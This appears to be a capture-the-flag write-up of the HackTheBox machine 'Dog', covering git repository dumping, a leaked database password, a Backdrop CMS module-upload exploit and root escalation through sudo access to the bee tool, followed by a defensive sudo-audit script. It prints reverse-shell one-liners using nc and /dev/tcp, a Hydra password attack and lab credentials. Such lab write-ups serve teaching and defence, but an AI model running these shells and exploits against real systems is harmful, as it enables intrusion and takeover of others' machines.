Overview
Dog is a Linux machine on HackTheBox rated Easy. The target runs Backdrop CMS on Apache with an exposed .git repository. Dumping the repo reveals database credentials and a valid username. After logging in as admin, a malicious PHP module provides a web shell and reverse shell. Privilege escalation abuses the Backdrop bee CLI tool, which can execute arbitrary PHP as root.
| Property | Value |
|---|---|
| OS | Linux (Ubuntu) |
| IP | 10.10.11.58 |
| Difficulty | Easy |
| Key Techniques | Git Dumper, Backdrop CMS RCE, Password Spraying, Sudo Abuse (bee) |
Enumeration
Port Scan
nmap -sC -sV 10.10.11.58
| Port | Service | Version |
|---|---|---|
| 22/tcp | SSH | OpenSSH 8.2p1 (Ubuntu) |
| 80/tcp | HTTP | Apache httpd 2.4.41 (Backdrop CMS 1.27.1) |
Nmap reveals key details about the web app:
- Backdrop CMS with title "Home | Dog"
- An exposed Git repository at http://10.10.11.58:80/.git/
- robots.txt with 22 disallowed entries showing CMS structure
Add to /etc/hosts:
10.10.11.58 dog.htb
Directory Brute-Force
gobuster dir -u http://dog.htb -w /usr/share/wordlists/dirb/common.txt
Key findings:
| Path | Note |
|---|---|
| /.git/HEAD | Exposed Git repository |
| /.htaccess | 403 Forbidden |
| /.htpasswd | 403 Forbidden |
Foothold
Git Repository Dump
The exposed .git directory allows full repository extraction using git-dumper:
pipx install git-dumper
git-dumper http://dog.htb/.git website
Extracting Credentials
Inside the dumped repository, settings.php contains the database connection string:
$database = 'mysql://root:BackDropJ2024DS2024@127.0.0.1/backdrop';
Searching the git history for email addresses associated with @dog.htb reveals the user tiffany as the site admin.
User Enumeration with BackDropScan
To confirm valid usernames, BackDropScan can brute-force the Backdrop CMS login:
python BackDropScan.py --url http://dog.htb --userslist /usr/share/wordlists/rockyou.txt --userenum
Results: tiffany and morris are valid users.
Logging In
The database password works as the CMS admin password:
| Username | Password |
|---|---|
| tiffany | BackDropJ2024DS2024 |
Exploitation
Backdrop CMS RCE — Module Upload
Backdrop CMS 1.27.1 is vulnerable to Remote Code Execution via malicious module upload (Exploit-DB 52021).
The exploit generates a PHP web shell packaged as a module:
python exploit52021.py http://10.10.11.58
# Backdrop CMS 1.27.1 - Remote Command Execution Exploit
# Evil module generated! shell.zip
# Go to http://10.10.11.58/admin/modules/install for Manual Installation.
# Your shell address: http://10.10.11.58/modules/shell/shell.php
Since the site doesn't accept .zip uploads, repackage as .tar:
tar czf shell.tar shell
Upload via Administration → Functionality → Install modules and access the shell at /modules/shell/shell.php.
Reverse Shell
From the web shell, establish a proper reverse shell:
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.14.242 4444 > /tmp/f
Lateral Movement to johncusack
Two users exist on the machine: jobert and johncusack. The web shell runs as www-data, so we need to pivot.
Using Hydra to confirm the password works for SSH (password reuse from the database):
hydra -l johncusack -P p.txt ssh://10.10.11.58
# [22][ssh] host: 10.10.11.58 login: johncusack password: BackDropJ2024DS2024
ssh johncusack@10.10.11.58
User flag:
johncusack@dog:~$ cat user.txt
cced24b324efb6c31b278fc51f45bfcc
Privilege Escalation
Sudo Enumeration
johncusack@dog:~$ sudo su
# Sorry, user johncusack is not allowed to execute '/usr/bin/su' as root on dog.
The user can't run su, but sudo does allow the bee binary:
sudo /usr/local/bin/bee --help
Abusing bee CLI
bee is the Backdrop CMS command-line tool (similar to Drupal's drush). It supports several dangerous subcommands:
| Command | Description |
|---|---|
| dbq | Execute a query using db_query() |
| eval | Evaluate arbitrary PHP code after bootstrapping Backdrop |
| php-script | Execute an arbitrary PHP file |
| scr | Execute an arbitrary PHP file after bootstrapping |
The eval command allows executing arbitrary PHP as root since bee runs with sudo:
sudo /usr/local/bin/bee --root=/var/www/html eval "echo shell_exec('bash -c \"bash -i >& /dev/tcp/10.10.14.242/4444 0>&1\"');"
This spawns a root reverse shell:
root@dog:~# cat root.txt
15959412f5610b4f57306de37c7dfb74
Key Takeaways
- Exposed .git directories are a critical misconfiguration. Tools like git-dumper can reconstruct the entire repository, often containing credentials in config files.
- Password reuse between database and CMS/SSH accounts is extremely common and should always be tested.
- Backdrop CMS module upload requires admin access but provides trivial RCE. Keep CMS platforms patched and restrict admin access.
- CLI tools with sudo (like bee, drush, wp-cli) that support code execution are equivalent to giving root shell access. Restrict sudo to specific safe subcommands if possible.
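The last takeaway can be checked mechanically on hosts you administer. The following is an added example, not part of the original writeup or of Backdrop: it audits sudo -l output for grants of the CLI tools named above, using the bee subcommands from the table. The sample output, the "wp" binary name and the finding labels are constructed assumptions.

```python
import re

# Subcommands the table above lists as running PHP files, PHP code or SQL.
BEE_DANGEROUS = {"eval", "php-script", "scr", "dbq"}
# Tools named in the takeaways; "wp" as wp-cli's binary name is an assumption.
CODE_EXEC_TOOLS = {"bee", "drush", "wp", "wp-cli"}

# Constructed sample of `sudo -l` output, not captured from the target.
SAMPLE_SUDO_L = """\
User johncusack may run the following commands on dog:
    (ALL : ALL) /usr/local/bin/bee
    (root) NOPASSWD: /usr/local/bin/bee cache-clear *
    (root) /usr/local/bin/bee eval *
    (root) /usr/bin/systemctl status apache2
"""

# "(runas) [TAG: ...] /path args[, /path args ...]"
ENTRY = re.compile(r"^\s*\([^)]*\)\s*(?:[A-Z_]+:\s*)*(?P<cmds>/.*)$")

def audit(sudo_l_output):
    """Return (command, label) pairs for risky grants of code-executing CLIs."""
    findings = []
    for line in sudo_l_output.splitlines():
        m = ENTRY.match(line)
        if not m:
            continue
        # Commands are comma-separated; a literal comma in an argument is "\,".
        for cmd in re.split(r"(?<!\\),\s*", m.group("cmds").strip()):
            parts = cmd.split()
            if not parts or parts[0].rsplit("/", 1)[-1] not in CODE_EXEC_TOOLS:
                continue
            tool, args = parts[0].rsplit("/", 1)[-1], parts[1:]
            if args == ['""']:          # sudoers "" = no arguments permitted
                continue
            # Skip global options such as --root=... to find the subcommand.
            sub = next((a for a in args if not a.startswith("-")), None)
            if not args or sub == "*":
                findings.append((cmd, "unrestricted"))   # any subcommand allowed
            elif tool == "bee" and sub in BEE_DANGEROUS:
                findings.append((cmd, "code-exec"))
            elif any("*" in a for a in args):
                # sudoers wildcards in arguments also match across spaces
                findings.append((cmd, "wildcard"))
    return findings

if __name__ == "__main__":
    for cmd, label in audit(SAMPLE_SUDO_L):
        print(f"{label:12} {cmd}")
```

Entries labelled "wildcard" are not necessarily exploitable, but they deserve manual review before being treated as a safe subcommand restriction.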